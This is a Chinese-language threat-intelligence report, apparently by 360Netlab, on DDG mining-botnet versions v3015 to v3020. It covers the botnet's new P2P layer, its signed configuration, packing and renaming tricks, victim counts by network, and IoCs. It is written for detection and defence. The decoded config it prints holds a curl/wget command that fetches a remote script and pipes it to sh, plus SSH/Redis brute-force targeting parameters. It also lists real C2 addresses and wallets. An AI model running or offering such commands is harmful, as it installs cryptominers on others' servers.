1. 概述

DDG.Mining.Botnet(以下简称DDG)是我们首先感知并披露的挖矿僵尸网络。我们上一篇相关报告发布于 2018.11 月份,针对当时最新的版本 v3014 。最近,DDG 开始了频繁的更新:从 2019.1.3~2019.1.18 的半个月时间内,发布了 v3015~v3019 共 5 个版本,并在 2019.1.27 发布了最新的 v3020 版本。考虑到该 Botnet 的挖矿收益并不很多( Total Paid: 233.9472098595 XMR),春节前这么短时间如此频繁更新而且没有新增任何漏洞利用,是否有什么大动作,我们拭目以待。

经过我们的梳理分析,这几个版本的更新主要做了以下两件事:

  • 僵尸网络内启用了P2P通信机制:集成了分布式节点控制框架 Memberlist,该框架实现了扩展版的弱一致性分布式控制协议 SWIM (改良版的协议称为 Lifeguard),并以此实现了 P2P 机制,用来管理自己的 Peers(Bots);
  • 样本实现方面增强了二进制样本层面的对抗:使用了加壳在内的多种手段,提升样本分析难度。

针对新的 P2P 通信机制,我们编写了针对 DDG 的跟踪程序,可以模拟 DDG 的 Bot。通过访问它的 P2P 网络,我们可以探测其中的节点信息,获取节点列表、最新的配置数据以及最新启用的 CC IP。过程中,我们参考了 Lifeguard 协议和 Memberlist 框架的特性以及 DDG 样本中 P2P 机制的实现细节。

DDG 最近版本更新一览:

1.1 DDG 僵尸网络背景信息

DDG 是一个专注于扫描控制 SSH 端口、 Redis 数据库 和 OrientDB 数据库服务器,并攫取服务器算力挖矿(门罗币)的僵尸网络。我们在 2017 年 10 月 25 日首次感知到 DDG 僵尸网络,并发布技术分析报告。之后 DDG 数次更新版本,我们也跟踪分析并发布数篇分析报告,报告列表如下,全部的报告列表在 这里

1.2 DDG 当前的挖矿收益情况:

Wallet:

42d4D8pASAWghyTmUS8a9yZyErA4WB18TJ6Xd2rZt9HBio2a
PmAAVpHcPM8yoDEYD9Fy7eRvPJhR7SKFyTaFbSYCNZ2t3ik

Type : XMR

Pool: nanopool Paid : 28.3146026927

Pool : supportxmr Paid : 205.632607167

Total Paid : 233.9472098595 XMR

2. DDG Peers 统计

最初我们感知到 DDG 僵尸网络的时候,曾经对它样本内置的 2 个域名采取了 Sinkhole 措施,以此获取到比较精准的 Bot 分布情况,当时我们共记录了 4,391 个失陷主机 IP 地址(参考 DDG.Mining.Botnet:一个瞄准数据库服务器的挖矿僵尸网络 )。

这次根据 P2P 机制实现了 Peers(Bots) 探测功能之后,我们也获取了比较准确的失陷主机相关数据,可以用来度量当前 DDG Botnet 的规模(为避免滥用,完整的 IP:Port列表不会公开)。 汇总最近一段时间的探测数据,我们共记录了 5,695 个失陷主机 IP 地址,最主要的受害者集中在中国大陆地区 :

从下面 Top20 网络自治域分布来看,国内各主要云计算服务商均有出现,国外若干互联网巨头公司也有少量中招,完整的ASN列表见文末 IoC 部分。完整的受害者列表我们不会公开,相关的云服务商可以联系我们获取。

AS37963|Hangzhou_Alibaba_Advertising_Co.,Ltd. 2245  
AS45090|Shenzhen_Tencent_Computer_Systems_Company_Limited 975  
AS4134|No.31,Jin-rong_Street 640  
AS4808|China_Unicom_Beijing_Province_Network 173  
AS38365|Beijing_Baidu_Netcom_Science_and_Technology_Co.,_Ltd. 144  
AS4837|CHINA_UNICOM_China169_Backbone 129  
AS14061|DigitalOcean,_LLC 70  
AS4812|China_Telecom_(Group) 59  
AS132203|Tencent_Building,_Kejizhongyi_Avenue 59  
AS58461|No.288,Fu-chun_Road 57  
AS45102|Alibaba_(China)_Technology_Co.,_Ltd. 52  
AS63949|Linode,_LLC 41  
AS23724|IDC,_China_Telecommunications_Corporation 39  
AS23650|AS_Number_for_CHINANET_jiangsu_province_backbone 38  
AS4847|China_Networks_Inter-Exchange 37  
AS4538|China_Education_and_Research_Network_Center 34  
AS17621|China_Unicom_Shanghai_network 32  
AS9808|Guangdong_Mobile_Communication_Co.Ltd. 31  
AS55933|Cloudie_Limited 27  
AS4766|Korea_Telecom 27  
OTHER    OTHER   785  

3. 样本执行流程,以及其中HUB IP LIST的结构变化

DDG 的主样本(ddgs.i686 / ddgs.x86_64)的主要执行流程跟以前的版本没有太大区别(详情参考 DDG.Mining.Botnet 近期活动分析 ),主要步骤如下:

  1. 依次与 HUB IP List 中的 IP 通信,与一个 HUB IP 连接成功之后,向 http://<hub_ip>:8000/slave 发送 HTTP POST 请求,以获取经过 msgpack 序列化编码过的配置数据;
  2. 解析配置数据,根据指定的 Miner 下载链接,下载矿机程序来挖矿;
  3. 解析配置数据,根据指定的针对 SSH/Redis 扫描端口、DstIP 生成策略来生成目的 IP 地址列表,发起针对 SSH / Redis 服务的扫描;
  4. 利用弱口令暴破或服务配置缺陷入侵扫描到的主机,入侵成功之后,植入 SSH 公钥来做后门;修改失陷主机的计划任务配置,加入恶意脚本 i.sh 的下载链接,i.sh 脚本中指定了最新的 DDG 主样本下载链接,会定期启动下载最新的 DDG 样本并执行;
  5. 解析配置数据,执行配置项中指定的其他命令。

在 DDG v3014 及更早期版本中,第 1 步用到的 HUB IP List 都是内置在样本中。只是有以下小区别:

  • 大部分版本的样本中,HUB IP List 是直接硬编码在样本中,可能是一个 Go 语言中 var hub_iplist []string 形式的变量。但更早版本是把这一份 IP 列表保存到了一个 hub_iplist.txt 文件中(如 v2011),这个 txt 文件被样本编译打包进二进制文件,样本执行过程中会从内存里提取这个文件并读取整个 HUB IP List 。我们把这一份 IP List 配置数据称为 HUB IP List ,原因就是早期版本中出现了这个 hub_iplist.txt 文件,以及样本内部把这些 List 中的 IP 称为 HUB
  • 大部分版本中,样本与 HUB IP 连接过程,都是自己用 Go 语言实现的网络沟通信。极个别用到了辅助的第三方网络库来实现这个过程,并持续维护当前样本与 HUB IP 的心跳通信。比如最早我们发现 DDG 中这个过程由第三方 Stream Multiplexing 库 Smux 来实现。

据我们观察,HUB IP List 中的 IP,绝大部分是连接不成功的,只有少数几个(1-3 个)可以成功连接并通过 HTTP POST 请求来获取配置文件。并且,承载配置文件下载服务的 IP,通常也承载了恶意样本的下载服务。也就是说,木马作者把极少数真正的 CC 服务器隐藏在上百个 IP 的列表之中,只有依次连接才能确定哪个是真正的 CC 服务器,可谓狡兔百窟 。最新版本的 2 个 CC 服务器如下:

4. P2P 机制

DDG 实现 P2P 机制所用的协议细节可以参考相关 Paper,所用实现该协议的框架 Memberlist 介绍可以参考 Hashicorp Memberlist 分析 。据我们分析,DDG 实现的 P2P 机制,其实是对以前硬编码 HUB IP List 的升级,同时整个僵尸网络的稳定性也得以提升;另外,僵尸网络背后的运营者维护起来更加灵活,隐蔽性也更好;最后,由于木马作者对配置数据用 RSA 算法做了签名,DDG 主样本获取到配置数据后会首先校验配置数据的签名,所以配置数据无法伪造,也就不能向整个 P2P 僵尸网络投毒。相应地,清除僵尸网络的难度也陡然增加。

DDG v3015~v3020 加入了 P2P 机制以后,所谓的 HUB IP List 就有了新变化:

  • 木马作者开始尝试只在样本中内置硬编码 1 个IP(v3015 版内置了一个 61.91.81.253:7946 ),根据所用分布式协议以及 Memberlist 框架特性,样本可以通过这个 IP 加入 P2P 网络;
  • 显然 v3015 这个C2布局是脆弱的,任何单一IP都随时可能脱离 DDG 所有者的控制,如果上述关键IP 61.91.81.253:7946 脱离了 DDG 的控制,后续其它新感染IP都无法加入 DDG 的 P2P网络。这就注定了 v3015 是个临时版本;
  • 作为改进,从 v3016 版本开始,每个样本中又内置 200 条 IP:Port 的列表。这些 IP:Port 绝大多数是木马作者整理出来的 P2P 网络中的其他失陷主机(极个别是真正的 CC 服务器,提供配置数据和样本的下载服务),这样就大大增加了当前样本加入 P2P 网络的成功率。

木马成功加入了 P2P 网络之后,就会调用 memberlist.Members() 函数来获取当前 P2P 网络中的 Peers 列表。由于 Memberlist 实现的是弱一致性分布式控制协议,所以每个 Peers 保存的节点列表都不是 P2P 网络中的完整列表,这个函数只能获取部分 Peers 列表。据我们观察,每次函数调用能获取大约 1,900 个 Peers 信息。

在 v3015~v3019 这 5 个版本的主样本中,获取到了 Peers 信息之后,样本会提取每个 Peer 的 IP:Port ,汇总成一份列表,并把这个列表以明文形式保存到 ~/.ddg/<VERSION_NUMBER>.bs 文件中。值得注意的是,木马在运行过程中,会持续与其他 Peers 通信,通信方式遵循所用协议和 Memberlist 框架实现。并且木马会多次获取节点列表,根据获取到的 Peers 列表动态更新 ~/.ddg/<VERSION_NUMBER>.bs 文件的内容,所以在不同的时间点查看 .bs 文件,里面的 IP:Port 列表信息会有所不同。样本中操作 .bs 文件的代码如下:

到了最新的 v3020 版本,木马作者用开源的内嵌 KV 存储引擎 Bolt 取代了之前的 ~/.ddg/<VERSION_NUMBER>.bs 文件。即,样本获取到的 Peers 列表不再明文存储到本地文件中,而是存放到了内嵌的一个小型数据库中。对这份 Peers 信息列表的更新、读取调用,则跟旧版本无本质区别。样本中调用 Bolt 的关键代码如下:

然后木马会尝试跟获取到的节点 IP 通信,连接成功以后,通过向 http://<ip>:8000/slave 发送 HTTP POST 请求来获取配置数据。配置数据是经过 msgpack 序列化编码的,解码后内容示例如下:

{
    'Data':{
        'CfgVer': 6,
        'Cmd': {
            'AAredis': {
                'Duration': '240h',
                'GenAAA': False,
                'GenLan': True,
                'IPDuration': '6h',
                'Id': 6062,
                'Ports': [6379, 6389, 7379],
                'ShellUrl': 'hxxp://132.148.241.138:8000/i.sh',
                'Timeout': '1m',
                'Version': 3017
            },
            'AAssh': {
                'Duration': '240h',
                'GenAAA': False,
                'GenLan': True,
                'IPDuration': '12h',
                'Id': 2057,
                'NThreads': 100,
                'Ports': [22, 2222, 12222, 52222, 1987],
                'ShellUrl': 'hxxp://132.148.241.138:8000/i.sh',
                'Timeout': '1m',
                'Version': 3017
            },
            'Killer': [{
                    'Expr': '(/tmp/ddgs.3011|/tmp/ddgs.3012|/tmp/ddgs.3013|/tmp/ddgs.3014|/tmp/ddgs.3015|   /tmp/ddgs.3016)',
                    'Id': 475,
                    'Timeout': '60s',
                    'Version': 3017
                },
                {
                    'Expr': '.+(cryptonight|stratum+tcp://|dwarfpool.com|supportxmr.com).+',
                    'Id': 483,
                    'Timeout': '60s',
                    'Version': -1
                },
                {
                    'Expr': './xmr-stak|./.syslog|/bin/wipefs|./xmrig|/tmp/wnTKYg|/tmp/2t3ik',
                    'Id': 484,
                    'Timeout': '60s',
                    'Version': -1
                },
                {
                    'Expr': '/tmp/qW3xT.+',
                    'Id': 481,
                    'Timeout': '60s',
                    'Version': 3017
                }
            ],
            'LKProc': [{
                'Expr': '/tmp/qW3xT.4',
                'Id': 488,
                'Timeout': '60s',
                'Version': 3017
            }],
            'Sh': [{
                    'Id': 479,
                    'Line': '(curl -fsSL hxxp://132.148.241.138:8000/i.sh||wget -q -O-  hxxp://132.148.241.138:8000/i.sh) | sh',
                    'Timeout': '120s',
                    'Version': -1
                },
                {
                    'Id': 486,
                    'Line': 'chattr -i /tmp/qW3xT.4; chmod +x /tmp/qW3xT.4',
                    'Timeout': '20s',
                    'Version': 3017
                }
            ]
        },
        'Config': {
            'Interval': '60s'
        },
        'Miner': [{
            'Exe': '/tmp/qW3xT.4',
            'Md5': '9dd8c5b1dc74286d81bc78372d9b7f27',
            'Url': '/static/qW3xT.4'
        }]
    },
    'Signature': [0x3b,0xd9,0x73,0x04,0x6d,0x75,0x68,0xe8,0xdd,0xd6,0x0c,0x5e,0xac,0xd1,0x29,0x2d,0x16,0x31,0x03,0xf4,0xfb,0xbb,0xa8,0x7d,0xba,0x6a,0xc8,0xda,0x6f,0xec,0x42,0x16,0x6a,0x00,0x8b,0x62,0x3f,0xa1,0x11,0x9b,0x16,0xe8,0xf2,0x13,0xb1,0x45,0x40,0xc5,0xd4,0xc6,0xaa,0x90,0x99,0x98,0x4b,0xc9,0x70,0x66,0x77,0x18,0xa9,0x82,0x53,0xb9,0x4f,0x10,0x05,0xdf,0x8d,0x6c,0x3a,0x31,0x2b,0x45,0x6f,0x9d,0xcb,0xd2,0x7d,0x5e,0x90,0x5f,0xb9,0x59,0x9e,0xa2,0x40,0x02,0x1b,0xe9,0xed,0xd5,0x57,0xb5,0x09,0x41,0x1e,0xd8,0x41,0xd8,0x0b,0xa8,0xd1,0x54,0x00,0xab,0x43,0xdc,0x70,0xce,0xca,0x14,0xc5,0x19,0xc9,0x37,0x0f,0x19,0xe0,0x02,0x95,0x30,0x57,0xa6,0xbb,0xc4,0xa6,0x85,0x51,0xcc,0x9b,0x0d,0xc4,0xc5,0x7d,0xb9,0xc4,0xa0,0x93,0x00,0xec,0x52,0x06,0x77,0xfe,0x82,0x52,0x1e,0x88,0xf2,0xe2,0xc6,0x21,0x3e,0x81,0x7e,0x1e,0x53,0x9d,0xb0,0xab,0xd4,0xc2,0xa3,0x85,0x8b,0xef,0xac,0xdd,0x9d,0x4b,0x5a,0x13,0x8e,0xa1,0x31,0x6d,0xc5,0xb2,0xf4,0xca,0x54,0x85,0x29,0xa0,0x62,0x0d,0xac,0xde,0xfa,0x86,0x09,0x2b,0x1c,0x05,0x5f,0xa0,0xa4,0x91,0x11,0xb0,0x6d,0x7e,0x1c,0xab,0x31,0x6f,0xca,0x64,0x15,0x44,0xe5,0xaf,0x24,0x12,0xb6,0x74,0xde,0x9c,0xc1,0xf7,0x0c,0x22,0x80,0x1f,0x07,0x2b,0x57,0xe2,0xfb,0xf9,0x39,0x0b,0x1b,0x4f,0xa3,0x82,0x07,0xce,0x35,0x41,0x23,0x73,0x94,0x8c,0x27,0x1b,0x77,0x1f,0x5e,0xdd,0xb5,0xb1,0xa6,0xa1,0x6c]
}

注意配置数据最后一项: Signature ,这其实是木马作者拿自己的 RSA 私钥对配置数据中的 Data 部分(真正用到的配置)生成的一个 RSA 签名字段。样本在解码配置数据之后,会用样本中内置的 RSA 公钥对 Data 部分配置数据进行校验,校验通过之后才会采用这些配置。样本中内置的 RSA 公钥如下:

-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1+/izrOGcigBPC+oXnr2  
S3JI76iXxqn7e9ONAmNS+m5nLQx2g0GW44TFtMHhDp1lPdUIui1b1odu36i7Cf0g  
31vdYi1i6nGfXiI7UkHMsLVkGkxEknNL1c1vv0qE1b2i2o4TlcXHKHWOPu4xrpYY  
m3Fqjni0n5+cQ8IIcVyjkX7ON0U1n8pQKRWOvrsPhO6tvJnLckK0P1ycGOcgNiBm  
sdA5WDjw3sg4xWCQ9EEpMeB0H1UF/nv7AZQ0etncMxhiWoBxamuPWY/KS3wZStUd  
gsMBOAOOpnbxL9N+II7uquQQkMmO6HriXRmjw14OmSBEoEcFMWF2j/0HPVasOcx2  
xQIDAQAB  
-----END PUBLIC KEY-----

由此可见,这份配置数据无法伪造。这样一来,我们就只能加入 DDG 的 P2P 进行节点探测,而无法对整个 P2P 网络进行投毒。

对配置数据的解析与使用,就与 DDG 之前的版本没有本质区别了,此文不详述。

5. 对抗分析的措施

5.1 样本内置节点 IP 列表从明文到编码

前文说过,DDG v3015 版本的核心样本中,内置的节点 IP:Port 只有一个明文的 61.91.81.253:7946 ,如下:

而到了 v3016 版本,样本内置的节点则有一个上百条 IP:Port 列表:

再到了 v3017~v3020 这 4 个大版本,内置的节点列表有了更大改动:每个样本内置 200 个左右的 IP(不同版本的样本中内置的节点不同),IP 以 Hex 形式存放在样本,这样会稍微增大样本分析的难度。样本调用这些 IP 的时候会动态加上 :7946:7947 端口然后再与之通信。比如 v3017 中 Hex 形式的 IP 部分截图如下:

5.2 二进制样本加壳

DDG v3017 和 v3018 版本的样本,用 UPX v3.9.5 加了壳,使样本文件体积相应缩小,利于样本传输,也会使原有的二进制层面样本检测规则失效。在 v3019 版本中,样本取消了加壳,到了 v3020 版本,又加上了 UPX 壳。我们推测是之前几个版本的加壳只是用来测试效果,到了 v3020 版本,木马作者才放心加壳:

5.3 修改文件名

DDG 主样本的名字,最早是 ddg ,在样本中可以看到整个项目的名字也是 ddg ,这也是其名字的由来。但后来,它的文件名改成了 ddgs ,从 v3018 版本开始,木马文件在服务器端的文件名改成了 fmt ( Go 语言标准库之一),并且 v3019 下载到受害主机本地之后文件名改为 ljfhbcb 。这样的改动,可能会干扰以往对旧版本样本的检测规则:

然后,到了 v3020 版本,木马作者又把主样本名字改回了 ddgs ,把样本下载到受害主机本地的文件名改为 betsbccbrhjbcc

6. 联系我们

感兴趣的读者,可以在 twitter 或者在微信公众号 360Netlab 上联系我们,或者向我们发送电子邮件 netlab[at]360.cn。

为避免滥用,我们不会公布受害者 IP 列表。相关安全和执法机构,可以邮件联系netlab[at]360.cn获取被感染的IP地址列表。

7. IoC

CC IP:

104.236.156.211        14061|DigitalOcean, LLC      United States|California|San Francisco  
61.91.81.253           9287|TRUEINTERNET Co.,Ltd.   Thailand  
132.148.241.138        26496|GoDaddy.com, LLC       United States|Arizona|Phoenix  
45.77.166.74           20473|Choopa, LLC        United States|Florida|Miami  
117.141.5.87           9808|Guangdong Mobile Communication Co.Ltd.  China|Guangxi|Nanning  
104.248.181.42         14061|DigitalOcean, LLC      United States|California|San Francisco  

MD5:

61379bc98e062b01ee43ce6e831ebcce  
aa54c23cb4cb7729e5506db788b2c95c  
ed80b35ee59084f96aa10674fc0cce27  
ee677c1847a10f98ea40d9e7cadc371e  
61379bc98e062b01ee43ce6e831ebcce  
39a2303ffff0c1ccb123a7963f0a815a  
3feaa446f0121b73723dde142fe23deb  
7cf1a0a6b189b8778d3952f7f38b37a1  
aa1eaf02b03f26ecfb9f09e7930fdfe0  
7cf1a0a6b189b8778d3952f7f38b37a1  
aa1eaf02b03f26ecfb9f09e7930fdfe0  
8c2e1719192caa4025ed978b132988d6  
d6187a44abacfb8f167584668e02c918  
9dd8c5b1dc74286d81bc78372d9b7f27  
3ebe43220041fe7da8be63d7c758e1a8  
d894bb2504943399f57657472e46c07d  
fb6bf5af8771b0dc446861484335fc5e  

Mining Pool Proxy:

104.130.210.206:8000    19994|Rackspace_Hosting    United States|Illinois|Chicago  
59.2.77.151:8000        4766|Korea_Telecom         Republic of Korea|Jeonbuk  
104.130.210.206:8443    19994|Rackspace_Hosting    United States|Illinois|Chicago  

ASN and Compromised Host Numbers

AS37963|Hangzhou_Alibaba_Advertising_Co.,Ltd. 2245  
AS45090|Shenzhen_Tencent_Computer_Systems_Company_Limited 975  
AS4134|No.31,Jin-rong_Street 640  
AS4808|China_Unicom_Beijing_Province_Network 173  
AS38365|Beijing_Baidu_Netcom_Science_and_Technology_Co.,_Ltd. 144  
AS4837|CHINA_UNICOM_China169_Backbone 129  
AS14061|DigitalOcean,_LLC 70  
AS4812|China_Telecom_(Group) 59  
AS132203|Tencent_Building,_Kejizhongyi_Avenue 59  
AS58461|No.288,Fu-chun_Road 57  
AS45102|Alibaba_(China)_Technology_Co.,_Ltd. 52  
AS63949|Linode,_LLC 41  
AS23724|IDC,_China_Telecommunications_Corporation 39  
AS23650|AS_Number_for_CHINANET_jiangsu_province_backbone 38  
AS4847|China_Networks_Inter-Exchange 37  
AS4538|China_Education_and_Research_Network_Center 34  
AS17621|China_Unicom_Shanghai_network 32  
AS9808|Guangdong_Mobile_Communication_Co.Ltd. 31  
AS55933|Cloudie_Limited 27  
AS4766|Korea_Telecom 27  
AS25820|IT7_Networks_Inc 27  
AS9318|SK_Broadband_Co_Ltd 17  
AS16509|Amazon.com,_Inc. 16  
AS58466|CHINANET_Guangdong_province_network 15  
AS15169|Google_LLC 15  
AS63835|No.293,Wanbao_Avenue 14  
AS58879|Shanghai_Anchang_Network_Security_Technology_Co.,Ltd. 14  
AS38283|CHINANET_SiChuan_Telecom_Internet_Data_Center 14  
AS59019|Beijing_Kingsoft_Cloud_Internet_Technology_Co.,_Ltd 13  
AS58593|Shanghai_Blue_Cloud_Technology_Co.,Ltd 13  
AS45187|Rackspace_IT_Hosting_AS_IT_Hosting_Provider_Hong_Kong 13  
AS20473|Choopa,_LLC 13  
AS56046|China_Mobile_communications_corporation 12  
AS135453|DISKOMINFO_TANGERANG_SELATAN 12  
AS7506|GMO_Internet,Inc 10  
AS24138|China_Tietong_Telecommunication_Corporation 10  
AS45899|VNPT_Corp 9  
AS45753|NETSEC 9  
AS133115|hongkong_kwaifong_information_service_limited 9  
AS131486|Beijing_Jingdong_360_Degree_E-commerce_Co.,_Ltd. 9  
AS9498|BHARTI_Airtel_Ltd. 8  
AS4816|China_Telecom_(Group) 8  
AS3786|LG_DACOM_Corporation 8  
AS26496|GoDaddy.com,_LLC 8  
AS45353|NITC:_IT_Agency_of_Government_of_Nepal 7  
AS24444|Shandong_Mobile_Communication_Company_Limited 7  
AS135026|ThinkDream_Technology_Limited 7  
AS9381|WTT_HK_Limited 6  
AS56067|453_Ladplacout_Jorakhaebua 6  
AS45058|Golden-Bridge_Netcom_communication_Co.,LTD. 6  
AS3462|Data_Communication_Business_Group 6  
AS24547|Hebei_Mobile_Communication_Company_Limited 6  
AS17638|ASN_for_TIANJIN_Provincial_Net_of_CT 6  
AS16276|OVH_SAS 6  
AS133380|Layerstack_Limited 6  
AS8100|QuadraNet_Enterprises_LLC 5  
AS8075|Microsoft_Corporation 5  
AS59078|Yunify_Technologies_Inc. 5  
AS56048|China_Mobile_Communicaitons_Corporation 5  
AS56041|China_Mobile_communications_corporation 5  
AS4835|China_Telecom_(Group) 5  
AS4621|Chulalongkorn_University 5  
AS17974|PT_Telekomunikasi_Indonesia 5  
AS137314|Politeknik_Negeri_Jember 5  
AS131392|GMO-Z.com_Runsystem_Joint_Stock_Company 5  
AS9802|Abitcool(China)_Inc. 4  
AS63612|Shenzhen_Qianhai_bird_cloud_computing_Co._Ltd. 4  
AS58543|Guangdong 4  
AS56040|China_Mobile_communications_corporation 4  
AS50673|Serverius_Holding_B.V. 4  
AS45093|Cnean_Internet_Exchange 4  
AS40676|Psychz_Networks 4  
AS36352|ColoCrossing 4  
AS22923|Yesup_Ecommerce_Solutions_Inc. 4  
AS18403|The_Corporation_for_Financing_&_Promoting_Technology 4  
AS135377|UCloud_(HK)_Holdings_Group_Limited 4  
AS134771|CHINANET_Sichuan_province_Chengdu_MAN_network 4  
AS134764|CHINANET_Guangdong_province_network 4  
AS134705|Itace_International_Limited 4  
AS9829|National_Internet_Backbone 3  
AS9341|PT_Indonesia_Comnets_Plus 3  
AS7489|HostUS 3  
AS62468|VpsQuan_L.L.C. 3  
AS58542|Yueyang 3  
AS58477|Argon_Data_Communication 3  
AS55990|Huawei_Cloud_Service_data_center 3  
AS55688|PT._Beon_Intermedia 3  
AS38682|National_Institute_of_Environmental_Research 3  
AS38197|Sun_Network_(Hong_Kong)_Limited_-_HongKong_Backbone 3  
AS24400|Shanghai_Mobile_Communications_Co.,Ltd. 3  
AS23969|TOT_Public_Company_Limited 3  
AS23844|Beijing_Guanghuan_Xinwang_Digital 3  
AS17964|Beijing_Dian-Xin-Tong_Network_Technologies_Co.,_Ltd. 3  
AS17816|China_Unicom_IP_network_China169_Guangdong_province 3  
AS17451|BIZNET_NETWORKS 3  
AS1659|Taiwan_Academic_Network_(TANet)_Information_Center 3  
AS135386|LinkChina_Telecom_Global_Limited. 3  
AS134763|CHINANET_Guangdong_province_network 3  
AS133774|Fuzhou 3  
AS133405|AS_Data(Hong_Kong)Limited 3  
ASReserved; 2  
AS9929|CHINA_UNICOM_Industrial_Internet_Backbone 2  
AS9416|Hoshin_Multimedia_Center_Inc. 2  
AS9312|xTom 2  
AS7545|TPG_Telecom_Limited 2  
AS7470|TRUE_INTERNET_Co.,Ltd. 2  
AS59134|PT._Datacomm_Diangraha 2  
AS58519|Cloud_Computing_Corporation 2  
AS58487|Rumahweb_Indonesia_CV. 2  
AS55967|Beijing_Baidu_Netcom_Science_and_Technology_Co.,_Ltd. 2  
AS55720|Gigabit_Hosting_Sdn_Bhd 2  
AS4809|China_Telecom_Next_Generation_Carrier_Network 2  
AS4800|Network_Access_Provider_and_Internet_Service_Provider 2  
AS45996|DAOU_TECHNOLOGY 2  
AS43554|Cifrovye_Dispetcherskie_Sistemy 2  
AS38731|CHT_Compamy_Ltd 2  
AS3842|RamNode_LLC 2  
AS3269|Telecom_Italia 2  
AS24309|Atria_Convergence_Technologies_Pvt._Ltd._Broadband_Internet_Service_Provider_INDIA 2  
AS24085|Quang_Trung_Software_City_Development_Company 2  
AS23947|PT.Mora_Telematika_Indonesia 2  
AS23695|ELGANET-ASN_PT._Elga_Yasa_Media_Internet_Service 2  
AS18245|CNNIC 2  
AS17753|INTERNET_SERVICE_PROVIDER 2  
AS17444|AS_number_for_New_World_Telephone_Ltd. 2  
AS138115|PT_Deneva 2  
AS137260|Bit_Exchange_Systems_Limited 2  
AS136959|China_Unicom_Guangdong_IP_network 2  
AS136950|Hong_Kong_FireLine_Network_LTD 2  
AS136190|DaLi 2  
AS135915|8_Floor,_96-98_Dao_Duy_Anh,_Phu_Nhuan,_HCMC 2  
AS135173|INDIA_METEOROLOGICAL_DEPARTMENT 2  
AS134768|CHINANET_Sichuan_province_Chengdu_MAN_network 2  
AS134765|CHINANET_Sichuan_province_Chengdu_MAN_network 2  
AS134762|CHINANET_Sichuan_province_Chengdu_MAN_network 2  
AS134548|DXTL_Tseung_Kwan_O_Service 2  
AS134366|Yunify_Technologies_(HK)_Limited 2  
AS133775|Xiamen 2  
AS133201|ABCDE_GROUP_COMPANY_LIMITED 2  
AS133199|SonderCloud_Limited 2  
AS131921|GMO_CLOUD_K.K. 2  
AS10029|SHYAM_SPECTRA_PVT_LTD 2  
ASNone; 1  
AS9931|The_Communication_Authoity_of_Thailand,_CAT 1  
AS9821|Department_of_Science_and_Technology 1  
AS9812|Oriental_Cable_Network_Co.,_Ltd. 1  
AS9708|Pukyong_National_University 1  
AS9430|Software_Technology_Parks_of_India,Block-IV 1  
AS9394|China_TieTong_Telecommunications_Corporation 1  
AS9370|SAKURA_Internet_Inc. 1  
AS9306|China_International_Electronic_Commerce_Center 1  
AS9287|TRUEINTERNET_Co.,Ltd. 1  
AS8517|National_Academic_Network_and_Information_Center 1  
AS7922|Comcast_Cable_Communications,_LLC 1  
AS7629|5F_L.V._Locsin_Bldg 1  
AS7552|Viettel_Group 1  
AS7162|Universo_Online_S.A. 1  
AS701|MCI_Communications_Services,_Inc._d/b/a_Verizon_Business 1  
AS7018|AT&T_Services,_Inc. 1  
AS6640|CenturyLink_Communications,_LLC 1  
AS63959|Hong_Kong_Syscloud_Technology_Limited 1  
AS63888|TISP_LIMITED 1  
AS63838|Hengyang 1  
AS63741|DCNET_Telecommunication_joint_stock_company 1  
AS63646|Beijing_Xiaoju_Science_and_Technology_Co.,_Ltd. 1  
AS63473|HostHatch,_Inc 1  
AS62217|VooServers_Ltd 1  
AS59164|Apollo_Online_Services_Pvt_ltd 1  
AS59089|NO.18_Building_University_of_Technology 1  
AS59077|Shanghai_UCloud_Information_Technology_Company_Limited 1  
AS58854|Xiamen_Aiya_network_Technology_Co._Ltd. 1  
AS58768|Daffodil_Online_Ltd. 1  
AS58717|Summit_Communications_Ltd 1  
AS58641|Trunkoz_Technologies_Pvt_Ltd 1  
AS58563|CHINANET_Hubei_province_network 1  
AS58541|Xiangtan 1  
AS58397|PT_Infinys_System_Indonesia 1  
AS58097|OOO_Taxcom 1  
AS577|Bell_Canada 1  
AS56209|R._K._INFRATEL_LIMITED 1  
AS56202|Suite_no_10,_Level_5_C_Wing 1  
AS56140|ModernOne_Data_Solutions_Sdn._Bhd. 1  
AS56047|China_Mobile_communications_corporation 1  
AS56044|China_Mobile_communications_corporation 1  
AS55824|NKN_Core_Network 1  
AS55803|Digital_Pacific_Pty_Ltd_Australia 1  
AS55769|SOUTH_EAST_ASIA_TELECOM_(Cambodia)_Co.,_LTD 1  
AS55701|PT._Usaha_Adisanggoro 1  
AS55410|C48_Okhla_Industrial_Estate,_New_Delhi-110020 1  
AS54600|PEG_TECH_INC 1  
AS54290|Hostwinds_LLC. 1  
AS53667|FranTech_Solutions 1  
AS53587|AZURE_TECHNOLOGY_CO.,_LIMITED 1  
AS52286|Columbus_Networks_Guatemala 1  
AS4788|TM_Net,_Internet_Service_Provider 1  
AS4787|PT_Cyberindo_Aditama 1  
AS4775|Globe_Telecoms 1  
AS4765|Pacific_Internet_Pte_Ltd 1  
AS47452|Super_iMAX 1  
AS4658|2012_Limited_/_Netfront 1  
AS46015|Exa_Bytes_Network_Sdn.Bhd. 1  
AS45910|i-System_Technology_Limited 1  
AS45766|Triangle_Services_Limited. 1  
AS45758|Triple_T_Internet/Triple_T_Broadband 1  
AS45754|Clear_Path_Networks_Inc 1  
AS45629|JasTel_Network_International_Gateway 1  
AS45587|China_Broadband_Communications_(CBCnet) 1  
AS45429|CAMBODIAN_SINGMENG_TELEMEDIA_CO.,_LTD 1  
AS45062|Guangzhou_NetEase_Computer_System_Co.,_Ltd. 1  
AS42331|PE_Freehost 1  
AS40065|CNSERVERS_LLC 1  
AS38802|Azurance_Limited 1  
AS38661|purplestones 1  
AS38532|USONYX_PTE_LTD 1  
AS38277|CommuniLink_Internet_Limited. 1  
AS38186|Forewin_Telecom_Group_Limited,_ISP_at 1  
AS38001|NewMedia_Express_Pte_Ltd 1  
AS37943|ZhengZhou_GIANT_Computer_Network_Technology_Co.,_Ltd 1  
AS3257|GTT_Communications_Inc. 1  
AS31898|Oracle_Corporation 1  
AS31034|Aruba_S.p.A. 1  
AS2828|MCI_Communications_Services,_Inc._d/b/a_Verizon_Business 1  
AS27979|Stel_Chile_S.A. 1  
AS278|Universidad_Nacional_Autonoma_de_Mexico 1  
AS26832|Rica_Web_Services 1  
AS26658|HT 1  
AS2609|Tunisia_BackBone_AS 1  
AS2549|Universidad_de_Guadalajara 1  
AS2516|KDDI_CORPORATION 1  
AS24940|Hetzner_Online_GmbH 1  
AS24521|PT._DATA_Utama_Dinamika 1  
AS24445|Henan_Mobile_Communications_Co.,Ltd 1  
